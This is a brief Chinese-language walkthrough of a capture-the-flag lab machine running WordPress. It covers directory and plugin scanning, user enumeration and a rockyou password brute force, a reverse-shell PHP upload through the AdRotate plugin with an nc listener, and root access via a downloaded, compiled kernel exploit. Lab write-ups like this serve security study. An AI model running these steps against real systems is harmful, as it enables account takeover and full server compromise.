1.扫描发现开放80端口
2.扫描网站目录
sudo dirb http://192.168.92.137
网站CMS为wordpress
3.msfconsole
msfconsole | 进入Metasploit的msfconsole界面 |
msf6 > use auxiliary/scanner/http/wordpress_scanner | WordPress扫描器模块 |
msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 192.168.92.137 | 设置目标主机地址 |
msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /wordpress | 指定WordPress安装在目标服务器的/wordpress子目录下 |
msf6 auxiliary(scanner/http/wordpress_scanner) > run | 开始运行 |
wordpress版本为5.5
4.
wpscan --url http://192.168.92.137/wordpress --enumerate u
wpscan枚举用户名
找到一个loly用户
wpscan --url http://192.168.92.137/wordpress/wp-login.php --usernames 'loly' --passwords /usr/share/wordlists/rockyou.txt
loly的密码是fernando
尝试登陆前要修改/etc/hosts 文件添加一个
192.168.92.137 loly.lc
登陆成功
5.在AdRotate-Mange Media插件可上传zip文件,并且会自动解密
<<shell.txt>>
将反弹shell代码修改为shell.php
压缩为shell.php.zip
上传至网站
nc -lvnp 监听端口
浏览器访问上传的反弹shell.php
http://loly.lc/wordpress/wp-content/banners/shell.phpphp
python3 -c"import pty;pty.spawn('/bin/bash')" | 升级shell |
uname -a查看内核,通过内核漏洞提权
找到该版本内核漏洞
下载漏洞利用脚本
在本地开放简易python服务器
在靶机上wget接收脚本
gcc编译后运行生成的exp文件
提权成功
不是很懂为什么确定要使用45010.c这个漏洞利用脚本
试了一下44298.c没用